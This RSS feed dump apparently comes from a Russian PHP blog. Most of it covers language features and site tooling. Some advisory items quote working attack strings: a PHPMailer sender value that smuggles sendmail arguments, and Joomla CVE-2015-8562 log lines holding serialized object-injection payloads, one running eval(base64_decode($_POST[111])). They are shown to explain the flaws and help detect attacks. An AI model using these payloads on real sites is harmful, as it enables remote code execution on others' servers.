http://xc.skillz.ru/?id=129&m=rss ru-ru skillz cms К новому году опубликована уязвимость, позволяющая выполнить произвольный удаленный код на на любых php сайтах с формами обратной связи. Эксплуатируется вызов функции mail в популярных библиотеках PHPMailer, SwiftMailer.<br /> <br /> Началось все с исправления уязвимости CVE-2016-10033 в PHPMailer 5.2.17: добавили экранирование переменной $sender функцией escapeshellarg() перед вызовом функции mail(). Однако, не учли что использование функции экранирования escapeshellarg() может конфликтовать с escapeshellcmd(), которая применяется для пятого параметра саймой функцией mail(). В результате мы получим неэкранированную последовательность, которая передается параметром к системному вызову mail, что ведет к возможности выполнения любой шелл команды.<br /> <br /> Например:<br /> <br /> <div class='code'><code data-language="php" class="lang-php"><span style="color: #0000ff;">$mail</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">SetFrom</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">&quot;<span style="color: #000099; font-weight: bold;">\&quot;</span>Attacker<span style="color: #000099; font-weight: bold;">\\</span>' -Param2 -Param3<span style="color: #000099; font-weight: bold;">\&quot;</span>@test.com&quot;</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">'Client Name'</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span></code></div> http://xc.skillz.ru/dev/php/article-phpmailer-sendmail-cve-2016-10033-cve-2016-10045.html Fri, 30 Dec 2016 13:15:53 +0300 surg30n PHP (LAMP) Две уязвимости в джумле позволяют получить админский доступ и в свою очередь залить файл шелла через медиа менеджер.<br /> <br /> 1. В com_users:user.register не осуществляется должная валидация данных. Злоумышленник может зарегистрировать пользователя с правами админа. Важно чтобы на сайте была включена регистрация, иначе в joomla 3.6.3 (и возможно более ранних) созданный пользователь не сможет быть активирован.<br /> <br /> 2. Проблема с вайтлистом в медиа менеджере<br /> <br /> Медиаменеджер в джумле имеет белый список загружаемых файлов (и их типов). По-умолчанию он не позволяет загружать файлы с расширением &quot;.php, .phtml&quot; или содержащие &quot;&lt;?php&quot;. Однако позволят загрузить файлы содержащие &lt;?= с расширением .pht. Файлы .pht по-умолчанию включены на всех apache серверах с mod_php в ubuntu =&gt; могут быть загружены и запущены!<br /> <br /> <img src="/images/cve-2016-8869/admin.png" alt="CVE-2016-8869 and CVE-2016-8870" border="0" /><br /> <br /> <span class="genofftop">Код эксплойта в продолжении</span> http://xc.skillz.ru/dev/php/article-joomla-344-346-cve-2016-8869-cve-2016-8870-exploit.html Thu, 10 Nov 2016 17:10:00 +0300 surg30n PHP (LAMP) <strong>Nullable types</strong> (типы допускающие возможность использования null)<br /> <br /> Ранее в PHP 7.0 появилась возможность указать тип передаваемых/возвращаемых значений, однако строгая типизация недопускала использование null в качестве значения параметра, как это делается в других языках.<br /> <br /> В 7.1 для указания допустимости null-значений перед типом параметра указывается &quot;<strong>?</strong>&quot;<br /> <br /> <div class='code'><code data-language="php" class="lang-php"><span style="color: #000000; font-weight: bold;">function</span> f01<span style="color: #009900;">&#40;</span>int <span style="color: #0000ff;">$i</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span><br /> &nbsp; <span style="color: #990000;">var_dump</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">$a</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span><br /> <span style="color: #009900;">&#125;</span><br /> &nbsp;<br /> <span style="color: #000000; font-weight: bold;">function</span> f02<span style="color: #009900;">&#40;</span>?int <span style="color: #0000ff;">$i</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">:</span> ?int <span style="color: #009900;">&#123;</span><br /> &nbsp; <span style="color: #990000;">var_dump</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">$a</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span><br /> &nbsp; <span style="color: #b1b100;">return</span> <span style="color: #0000ff;">$a</span><span style="color: #339933;">;</span><br /> <span style="color: #009900;">&#125;</span><br /> &nbsp;<br /> f01<span style="color: #009900;">&#40;</span><span style="color: #cc66cc;">10</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #666666; font-style: italic;">// int(10)</span><br /> f01<span style="color: #009900;">&#40;</span><span style="color: #000000; font-weight: bold;">null</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #666666; font-style: italic;">// TypeError: Argument 1 passed to f01() must be of the type integer, null given</span><br /> f02<span style="color: #009900;">&#40;</span><span style="color: #cc66cc;">20</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #666666; font-style: italic;">// int(10)</span><br /> f02<span style="color: #009900;">&#40;</span><span style="color: #000000; font-weight: bold;">null</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #666666; font-style: italic;">// null</span></code></div> http://xc.skillz.ru/dev/php/article-php71-whats-new.html Tue, 27 Sep 2016 16:24:00 +0300 surg30n PHP (LAMP) Пользую Firefox с первых версий. Браузер запускается с портативного usb диска.<br /> С недавних пор появилась проблема - при синхронизации закладок фф стал отъедать 25%CPU (т.е. одно ядро моего i2500). При этом усиленными темпами пытался записать что-то на диск (30Мб/c). Процедура продолжалась порядка 15 минут, далее - ошибка синхронизации. Все повторялось с интервалом в 10 минут. На это время можно забыть про FF - его UI становился не юзабельным (тупо лагал). <br /> <br /> <img src="/images/201512/ffsync/firefox-sync-cpu-usage.png" border="0" /> http://xc.skillz.ru/dev/m1sc/article-firefox-sync-error-with-high-cpu-hdd-usage.html Thu, 21 Jan 2016 10:04:00 +0300 surg30n Разное <strong>20151201 Core / Remote Code Execution Vulnerability</strong><br /> <br /> Позволяет злоумышленнику выполнить произвольный код. За последний месяц в джумле нашли две критические уязвимости. Последняя распространяется на все версии системы начиная с 1.5.0 и до 3.4.5. Кто-то мог эксплуатировать эту дыру около 8 лет, 8 лет Карл!.<br /> <br /> <strong>Атакован ли ваш сайт?</strong><br /> <br /> Можно определить, посмотрев логи:<br /> <br /> <br /> <div class='code'><code data-language="bash" class="lang-bash"><span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>log<span style="color: #000000; font-weight: bold;">/</span>httpd $ <span style="color: #c20cb9; font-weight: bold;">grep</span> JDatabaseDriverMysqli <span style="color: #000000; font-weight: bold;">*</span>.log<br /> &nbsp;<br /> access.log:71.19.248.201 - - <span style="color: #7a0874; font-weight: bold;">&#91;</span><span style="color: #000000;">15</span><span style="color: #000000; font-weight: bold;">/</span>Dec<span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">2015</span>:<span style="color: #000000;">17</span>:03:05 +0300<span style="color: #7a0874; font-weight: bold;">&#93;</span> <span style="color: #ff0000;">&quot;GET / HTTP/1.1&quot;</span> <span style="color: #000000;">301</span> <span style="color: #000000;">239</span> <span style="color: #ff0000;">&quot;-&quot;</span> <span style="color: #ff0000;">&quot;}__test|O:21:<span style="color: #000099; font-weight: bold;">\&quot;</span>JDatabaseDriverMysqli<span style="color: #000099; font-weight: bold;">\&quot;</span>:3:{s:2:<span style="color: #000099; font-weight: bold;">\&quot;</span>fc<span style="color: #000099; font-weight: bold;">\&quot;</span>;O:17:<span style="color: #000099; font-weight: bold;">\&quot;</span>JSimplepieFactory<span style="color: #000099; font-weight: bold;">\&quot;</span>:0:{}s:21:<span style="color: #000099; font-weight: bold;">\&quot;</span>\\0\\0\\0disconnectHandlers<span style="color: #000099; font-weight: bold;">\&quot;</span>; a:1:{i:0;a:2:{i:0;O:9:<span style="color: #000099; font-weight: bold;">\&quot;</span>SimplePie<span style="color: #000099; font-weight: bold;">\&quot;</span>:5:{s:8:<span style="color: #000099; font-weight: bold;">\&quot;</span>sanitize<span style="color: #000099; font-weight: bold;">\&quot;</span>;O:20:<span style="color: #000099; font-weight: bold;">\&quot;</span>JDatabaseDriverMysql<span style="color: #000099; font-weight: bold;">\&quot;</span>:0:{}s:8:<span style="color: #000099; font-weight: bold;">\&quot;</span>feed_url<span style="color: #000099; font-weight: bold;">\&quot;</span>;s:37:<span style="color: #000099; font-weight: bold;">\&quot;</span>phpinfo();JFactory::getConfig();exit;<span style="color: #000099; font-weight: bold;">\&quot;</span>; s:19:<span style="color: #000099; font-weight: bold;">\&quot;</span>cache_name_function<span style="color: #000099; font-weight: bold;">\&quot;</span>;s:6:<span style="color: #000099; font-weight: bold;">\&quot;</span>assert<span style="color: #000099; font-weight: bold;">\&quot;</span>;s:5:<span style="color: #000099; font-weight: bold;">\&quot;</span>cache<span style="color: #000099; font-weight: bold;">\&quot;</span>;b:1;s:11:<span style="color: #000099; font-weight: bold;">\&quot;</span>cache_class<span style="color: #000099; font-weight: bold;">\&quot;</span>;O:20:<span style="color: #000099; font-weight: bold;">\&quot;</span>JDatabaseDriverMysql<span style="color: #000099; font-weight: bold;">\&quot;</span>:0:{}}i:1;s:4:<span style="color: #000099; font-weight: bold;">\&quot;</span>init<span style="color: #000099; font-weight: bold;">\&quot;</span>;}}s:13:<span style="color: #000099; font-weight: bold;">\&quot;</span>\\0\\0\\0connection<span style="color: #000099; font-weight: bold;">\&quot;</span>;b:1;}\xf0\x9d\x8c\x86&quot;</span><br /> access.log:89.234.157.254 - - <span style="color: #7a0874; font-weight: bold;">&#91;</span><span style="color: #000000;">15</span><span style="color: #000000; font-weight: bold;">/</span>Dec<span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">2015</span>:08:<span style="color: #000000;">23</span>:06 +0300<span style="color: #7a0874; font-weight: bold;">&#93;</span> <span style="color: #ff0000;">&quot;GET / HTTP/1.1&quot;</span> <span style="color: #000000;">200</span> <span style="color: #000000;">16603</span> <span style="color: #ff0000;">&quot;-&quot;</span> <span style="color: #ff0000;">&quot;}__test|O:21:<span style="color: #000099; font-weight: bold;">\&quot;</span>JDatabaseDriverMysqli<span style="color: #000099; font-weight: bold;">\&quot;</span>:3:{s:2:<span style="color: #000099; font-weight: bold;">\&quot;</span>fc<span style="color: #000099; font-weight: bold;">\&quot;</span>;O:17:<span style="color: #000099; font-weight: bold;">\&quot;</span>JSimplepieFactory<span style="color: #000099; font-weight: bold;">\&quot;</span>:0:{}s:21:<span style="color: #000099; font-weight: bold;">\&quot;</span>\\0\\0\\0disconnectHandlers<span style="color: #000099; font-weight: bold;">\&quot;</span>; a:1:{i:0;a:2:{i:0;O:9:<span style="color: #000099; font-weight: bold;">\&quot;</span>SimplePie<span style="color: #000099; font-weight: bold;">\&quot;</span>:5:{s:8:<span style="color: #000099; font-weight: bold;">\&quot;</span>sanitize<span style="color: #000099; font-weight: bold;">\&quot;</span>;O:20:<span style="color: #000099; font-weight: bold;">\&quot;</span>JDatabaseDriverMysql<span style="color: #000099; font-weight: bold;">\&quot;</span>:0:{}s:8:<span style="color: #000099; font-weight: bold;">\&quot;</span>feed_url<span style="color: #000099; font-weight: bold;">\&quot;</span>;s:60:<span style="color: #000099; font-weight: bold;">\&quot;</span>eval(base64_decode(<span style="color: #007800;">$_POST</span>[111]));JFactory::getConfig();exit;<span style="color: #000099; font-weight: bold;">\&quot;</span>; s:19:<span style="color: #000099; font-weight: bold;">\&quot;</span>cache_name_function<span style="color: #000099; font-weight: bold;">\&quot;</span>;s:6:<span style="color: #000099; font-weight: bold;">\&quot;</span>assert<span style="color: #000099; font-weight: bold;">\&quot;</span>;s:5:<span style="color: #000099; font-weight: bold;">\&quot;</span>cache<span style="color: #000099; font-weight: bold;">\&quot;</span>;b:1;s:11:<span style="color: #000099; font-weight: bold;">\&quot;</span>cache_class<span style="color: #000099; font-weight: bold;">\&quot;</span>;O:20:<span style="color: #000099; font-weight: bold;">\&quot;</span>JDatabaseDriverMysql<span style="color: #000099; font-weight: bold;">\&quot;</span>:0:{}}i:1;s:4:<span style="color: #000099; font-weight: bold;">\&quot;</span>init<span style="color: #000099; font-weight: bold;">\&quot;</span>;}}s:13:<span style="color: #000099; font-weight: bold;">\&quot;</span>\\0\\0\\0connection<span style="color: #000099; font-weight: bold;">\&quot;</span>;b:1;}\xf0\x9d\x8c\x86&quot;</span></code></div><br /> <br /> <strong>TL;DR</strong><br /> Уязвимость заключается в отсутствии должной фильтрации данных пользователя (заголовки user-agent и x-forwarded-for). Данные сохраняются в базу данных в сериализованном виде обработчиком сессий. Из-за бага обработки UTF8 строк Mysql, при сохранении данные обрезаются, позволяя внедрить произвольный объект (выполнить код) в массив $_SESSION при чтении данных сессии из бд.<br /> http://xc.skillz.ru/dev/php/article-Joomla-remote-code-vulnerability-cve-2015-8562.html Thu, 17 Dec 2015 14:14:00 +0300 surg30n PHP (LAMP) Тестирование &quot;Привет мира&quot; на базе популярных PHP фреймворков. <br /> <br /> Конфигурация системы CentOS 6.6 64bit (VM; VirtualBox)<br /> PHP 5.5.30 (Remi RPM) Zend OPcache v7.0.4-dev с включенными phalcon.so и ice.so<br /> Apache 2.2<br /> <br /> Запускаются скрипты с настройками по умолчанию, без тюнинга. <br /> <br /> <img src="/images/201512/framework-bench-01.png" border="0" /> http://xc.skillz.ru/dev/php/article-popular-php-frameworks-benchmarks.html Wed, 02 Dec 2015 17:08:00 +0300 surg30n PHP (LAMP) Релиз PHP 7.0.0 состоялся 3.12.2015.<br /> <br /> Основные моменты, из-за которых старый код не будет работать:<br /> <br /> 1. Унифицированный синтаксис <br /> <br /> Выражение $foo-&gt;$bar['baz']() раньше означало $foo-&gt;{$bar['baz']}(), сейчас интерпретируется слева-направо: ($foo-&gt;$bar)['baz']()<br /> <br /> 2. Удаление устаревших расширений<br /> <br /> mysql, ereg... http://xc.skillz.ru/dev/php/article-PHP-7-migration-from-PHP-5.html Mon, 23 Nov 2015 11:21:00 +0300 surg30n PHP (LAMP) <h3>Функции CSPRNG</h3><br /> <span class="genofftop">Криптографически стойкий генератор псевдослучайных чисел (англ. Cryptographically secure pseudorandom number generator, CSPRNG)</span><br /> <br /> Новведение добавляет две новых функции для генерации криптографически стойких целых чисел и строк.<br /> Функции работают одинаково на всех платформах.<br /> <br /> <div class='code'><code data-language="php" class="lang-php">string random_bytes<span style="color: #009900;">&#40;</span>int length<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span><br /> int random_int<span style="color: #009900;">&#40;</span>int <span style="color: #990000;">min</span><span style="color: #339933;">,</span> int <span style="color: #990000;">max</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span></code></div><br /> <br /> Обе функции сгенерируют исключение `Error`, если источник необходимой случайности будет не найден. http://xc.skillz.ru/dev/php/article-php7-whats-new-part-2.html Fri, 20 Nov 2015 22:23:00 +0300 surg30n PHP (LAMP) В PHP5 присутствует неоднозначность в работе foreach, которая возникает из-за манипуляции с внутренним указателем массива или модификации элементов массива, который перебирается в foreach.<br /> <br /> Поведение foreach может зависить от ссылочного счетчика или типа итерируемого объекта - является он значением или ссылкой.<br /> <br /> Вот несколько примеров foreach<br /> <br /> 1. Неработающий current() <br /> 2. unset() может исключить элемент из перебора, а может и нет http://xc.skillz.ru/dev/php/article-php7-foreach.html Fri, 20 Nov 2015 21:57:00 +0300 surg30n PHP (LAMP) Релиз PHP 7 запланирован на конец ноября 2015 года.<br /> В новой версии PHP появились интересные синтаксические плюшки, новые функции<br /> а также самые долгожданные изменения коснулись ядра интерпретатора - проект phpng, увеличивает скорость<br /> обработки скриптов практически вдвое по сравнению с PHP 5.x, плюс более эффективный менеджер памяти.<br /> <br /> <img src="/images/php7/bench.png" border="0" /> http://xc.skillz.ru/dev/php/article-php7-whats-new.html Fri, 20 Nov 2015 11:50:00 +0300 surg30n PHP (LAMP) Подойдет для сайтов НЕ использующих Joomla -<br /> для отслеживания подборов паролей и бана неправильных пользователей.<br /> <br /> <span class="genofftop">для защиты от брутфорса реальной админки лучше использовать fail2ban / mod_security / etc</span><br /> <br /> Для установки скрипта достаточно скопировать его в корень сайта в папку /administrator.<br /> При вводе любого пароля скрипт дополнит лог файл log.txt, а пользователю покажется ошибка с фейспалмом на заднем плане.<br /> Жаль роботы его не оценят. http://xc.skillz.ru/dev/php/article-joomla-fake-administrator-bruteforce.html Thu, 19 Nov 2015 13:57:45 +0300 surg30n PHP (LAMP) Джумла в базовой версии имеет выключенный плагин кэширования для страниц (целиком).<br /> Если сайт изменяется не часто, но медленно работает - имеет смысл включть данный плагин.<br /> <br /> Алгоритм работы этого плагина: слушаем события<br /> <br /> onAfterInitialise - смотрим есть ли кэш данной страницы, если есть отдаем клиенту, завершаем работу<br /> onAfterRender - кэшируем содержание страницы, если она не прописана в исключениях <br /> <br /> После включения не замечаем прибавки в скорости генерации страницы? http://xc.skillz.ru/dev/php/article-joomla-page-cache-plugin-minify-css-js.html Thu, 19 Nov 2015 13:40:00 +0300 surg30n PHP (LAMP) Скрипт мониторинга цен с яндекс маркета.<br /> При запуске скрипт загружает список товаров из файлов excel (в папке /sheets/*.xlsx).<br /> Для каждого товара на втором листе должен быть указан идентификатор (http://market.yandex.ru/product/{8229520}/)<br /> Далее скрипт обращается к яндекс маркету и достает мин и мак цены на товар. <br /> В таблицу записывается средняя цена.<br /> <br /> Обновлятор можно повесить на крон/планировщик.<br /> Для папки cache требуются права на запись.<br /> <br /> <img src="/downloads/uploads/ymon.png" border="0" /> http://xc.skillz.ru/dev/php/article-script_monitoringa_cen_yandex_marketa.html Wed, 08 Apr 2015 12:25:21 +0300 surg30n PHP (LAMP) <strong>Функции с переменным количеством аргументов ...</strong> // Variadic functions<br /> <br /> Новый оператор <strong>...</strong>, означающий упаковку/раскаповку аргументов.<br /> <br /> Например, func_get_args() теперь может быть заменена на <br /> <br /> Массивы и перечисляемые типы могут быть распакованы в список аргументов.<br /> Этот оператор известен как &quot;splat operator&quot; в других языках, например Ruby.<br /> <br /> Пример: известная своим неторопливым временем исполнения функция <br /> call_user_func_array(callable $callback, array $param_arr)<br /> <br /> может быть заменена на <br /> <br /> <div class='code'><code data-language="php" class="lang-php"><span style="color: #0000ff;">$param_arr</span> <span style="color: #339933;">=</span> <span style="color: #009900;">&#91;</span><span style="color: #cc66cc;">1</span><span style="color: #339933;">,</span><span style="color: #cc66cc;">2</span><span style="color: #339933;">,</span><span style="color: #cc66cc;">3</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span><br /> <span style="color: #0000ff;">$callback</span><span style="color: #009900;">&#40;</span><span style="color: #339933;">...</span><span style="color: #0000ff;">$param_arr</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span></code></div><br /> http://xc.skillz.ru/dev/php/article-PHP_5_6_whats_new.html Tue, 18 Nov 2014 13:23:00 +0300 surg30n PHP (LAMP) Решил на досуге переписать свою старую мультисайтовую cms (SatCMS).<br /> <br /> Что получилось:<br /> <br /> - php &gt;=5.3, mysql/sqlite<br /> - зависимости обрабатываются менеджерами пакетов: php - composer, js - bower<br /> - мультисайтовость (возможность вести несколько сайтов/поддоменов) на одном движке<br /> - морда/админка - шаблоны smarty, bootstrap 3<br /> - админ-бэкенд на requirejs/angularjs/bootstrap. <br /> Angular-way не блюдется, так как много легаси кода, и выпиливать jquery-подход совсем не хочется, простите за dom в контроллере :)<br /> - правка элементов сайта прямо с морды (пользуется inline tinymce)<br /> <br /> <img src="http://satcms.ru/images/thumb.png" border="0" /><br /> <br /> Посмотреть:<br /> <br /> Демо <a href="http://satcms.ru/" class="postlink">http://satcms.ru/</a><br /> Гитхаб <a href="/r.php?url=https://github.com/rustyJ4ck/SatCMS" title="https://github.com/rustyJ4ck/SatCMS" class="postlink" target="_blank">https://github.com/rustyJ4ck/SatCMS</a><br /> <br /> http://xc.skillz.ru/dev/php/article-restyle_SatCMS.html Wed, 21 May 2014 16:56:25 +0400 surg30n PHP (LAMP) Имеем таблицу с торговыми предложениями<br /> <br /> <div class='code'><code data-language="sql" class="lang-sql"><span style="color: #990099; font-weight: bold;">CREATE</span> <span style="color: #990099; font-weight: bold;">TABLE</span> <span style="color: #990099; font-weight: bold;"><span style="color: #009900;">IF</span> <span style="color: #CC0099; font-weight: bold;">NOT</span> EXISTS</span> <span style="color: #008000;">`offers`</span> <span style="color: #FF00FF;">&#40;</span><br /> &nbsp; <span style="color: #008000;">`id`</span> <span style="color: #999900; font-weight: bold;">int</span><span style="color: #FF00FF;">&#40;</span><span style="color: #008080;">10</span><span style="color: #FF00FF;">&#41;</span> <span style="color: #FF9900; font-weight: bold;">unsigned</span> <span style="color: #CC0099; font-weight: bold;">NOT</span> <span style="color: #9900FF; font-weight: bold;">NULL</span><span style="color: #000033;">,</span><br /> &nbsp; <span style="color: #008000;">`product<span style="color: #008080; font-weight: bold;">_</span>id`</span> <span style="color: #999900; font-weight: bold;">int</span><span style="color: #FF00FF;">&#40;</span><span style="color: #008080;">10</span><span style="color: #FF00FF;">&#41;</span> <span style="color: #FF9900; font-weight: bold;">unsigned</span> <span style="color: #CC0099; font-weight: bold;">NOT</span> <span style="color: #9900FF; font-weight: bold;">NULL</span><span style="color: #000033;">,</span><br /> &nbsp; <span style="color: #008000;">`value`</span> <span style="color: #999900; font-weight: bold;">decimal</span><span style="color: #FF00FF;">&#40;</span><span style="color: #008080;">10</span><span style="color: #000033;">,</span><span style="color: #008080;">0</span><span style="color: #FF00FF;">&#41;</span> <span style="color: #CC0099; font-weight: bold;">NOT</span> <span style="color: #9900FF; font-weight: bold;">NULL</span><span style="color: #000033;">,</span><br /> &nbsp; <span style="color: #008000;">`discount`</span> <span style="color: #999900; font-weight: bold;">tinyint</span><span style="color: #FF00FF;">&#40;</span><span style="color: #008080;">4</span><span style="color: #FF00FF;">&#41;</span> <span style="color: #CC0099; font-weight: bold;">NOT</span> <span style="color: #9900FF; font-weight: bold;">NULL</span><span style="color: #000033;">,</span><br /> &nbsp; <span style="color: #008000;">`created<span style="color: #008080; font-weight: bold;">_</span>at`</span> <span style="color: #999900; font-weight: bold;">datetime</span> <span style="color: #CC0099; font-weight: bold;">NOT</span> <span style="color: #9900FF; font-weight: bold;">NULL</span> <span style="color: #990099; font-weight: bold;">DEFAULT</span> <span style="color: #000099;">CURRENT_TIMESTAMP</span><br /> <span style="color: #FF00FF;">&#41;</span><span style="color: #000033;">;</span></code></div> http://xc.skillz.ru/dev/php/article-mysql-delete-duplicates-based-on-date-id.html Tue, 10 Sep 2013 15:20:00 +0400 surg30n PHP (LAMP) Под 200 запросов на рендер главной страницы - это многовато.<br /> Например выборка брендов и товаров для них занимает порядочное количество времени, если<br /> делать это с помощью средств встроенной ORM.<br /> <br /> Пример времени выполнения главной страницы<br /> с включенным файловым кэшем, отключенными сайдбарами и практически без модулей<br /> <br /> <div class='code'><code data-language="php" class="lang-php"><span style="color: #009900;">&#91;</span><span style="color:#800080;">0.0000</span><span style="color: #009900;">&#93;</span> Start<br /> <span style="color: #009900;">&#91;</span><span style="color:#800080;">0.0925</span><span style="color: #009900;">&#93;</span> DispatcherCore<span style="color: #339933;">::</span><span style="color: #004000;">dispatch</span> <span style="color: #339933;">:</span> IndexController<br /> <span style="color: #009900;">&#91;</span><span style="color:#800080;">0.1333</span><span style="color: #009900;">&#93;</span> FrontControllerCore<span style="color: #339933;">::</span><span style="color: #004000;">initContent</span><br /> <span style="color: #009900;">&#91;</span><span style="color:#800080;">0.2011</span><span style="color: #009900;">&#93;</span> INDEX IndexController<span style="color: #339933;">::</span><span style="color: #004000;">initContent</span><br /> <span style="color: #009900;">&#91;</span><span style="color:#800080;">0.2063</span><span style="color: #009900;">&#93;</span> HomeSlider<span style="color: #339933;">::</span><span style="color: #004000;">hookDisplayHome</span><br /> <span style="color: #009900;">&#91;</span><span style="color:#800080;">0.2735</span><span style="color: #009900;">&#93;</span> PSwidget text cached <span style="color: #339933;">--</span> <span style="color:#800080;">0.00029</span> ttl <span style="color: #cc66cc;">300</span><br /> <span style="color: #009900;">&#91;</span><span style="color:#800080;">0.2740</span><span style="color: #009900;">&#93;</span> PSwidget index<span style="color: #339933;">/</span>brands cached <span style="color: #339933;">--</span> <span style="color:#800080;">0.00032</span> ttl <span style="color: #cc66cc;">300</span><br /> <span style="color: #009900;">&#91;</span><span style="color:#800080;">0.2750</span><span style="color: #009900;">&#93;</span> Smarty<span style="color: #339933;">:</span> <span style="color: #339933;">/</span>themes<span style="color: #339933;">/</span>mytheme<span style="color: #339933;">/</span>layout<span style="color: #339933;">-</span>index<span style="color: #339933;">.</span>tpl <span style="color: #339933;">--</span> <span style="color:#800080;">0.00666</span><br /> <span style="color: #009900;">&#91;</span><span style="color:#800080;">0.2751</span><span style="color: #009900;">&#93;</span> Done<br /> <span style="color: #009900;">&#91;</span><span style="color:#800080;">0.2752</span><span style="color: #009900;">&#93;</span> SQL <span style="color: #cc66cc;">92</span> x <span style="color:#800080;">0.02554</span></code></div><br /> <br /> http://xc.skillz.ru/dev/php/article-Prestashop_1-5-3_what_is_this.html Sun, 24 Feb 2013 15:16:46 +0400 surg30n PHP (LAMP) IE9, казалось бы, должен безусловно поддерживать CSS3, но увы - только частично.<br /> К примеру, кнопку с градиентом и скругленными углами (border-radius) IE9 нарисует с бэкграундом,<br /> выступающим за скругленные углы. Вместо того чтобы реализовать нормальную поддержку css, мелкософт сделал<br /> поделку (внезапно - полезную), которая позволяет генерить градиенты в svg формате для использования в качестве<br /> бэкграунда.<br /> <br /> Что делать? http://xc.skillz.ru/dev/css_jabascript/article-CSS3_buttons_IE9_gradient_radius.html Fri, 22 Feb 2013 11:33:28 +0400 surg30n CSS/Javascript Переход на пакетный менеджер pkgng<br /> <br /> На старом сервере при установке пакета увидел сообщение - <br /> pkg_install EOL is scheduled for 2014-09-01. Please consider migrating to pkgng<br /> --&gt; решил обновить пакетный менеджер. http://xc.skillz.ru/dev/freebsd/article-pkgng-freebsd-8-4.html Mon, 10 Sep 2012 15:20:00 +0400 surg30n Сервер (FreeBSD) <strong>Новый функционал для работы с паролями</strong><br /> <br /> Текущая реализация генерации пароля в большинстве проектов стоится на не стойких<br /> алгоритмах типа md5, sha1. В php5.5 предлагается улучшить парольный API.<br /> <a href="/r.php?url=https://wiki.php.net/rfc/password_hash" title="Подробнее (https://wiki.php.net/rfc/password_hash)" class="postlink" target="_blank">Подробнее</a><br /> <br /> <strong>empty() заставят работать с функциями и выражениями</strong><br /> <br /> В настоящий момент empty($this-&gt;getBlah()) вызовет фатальную ошибку.<br /> <br /> <strong>Скалярные тайпхинты!</strong><br /> <br /> Дождались.. PHP, язык с отсутствующей типизацией параметров возможно обзаведется<br /> уточнениями типов (typehints) для простых типов int, float, bool, string. http://xc.skillz.ru/dev/php/article-php-5-5-whats-new.html Thu, 12 Jul 2012 17:13:14 +0400 surg30n PHP (LAMP)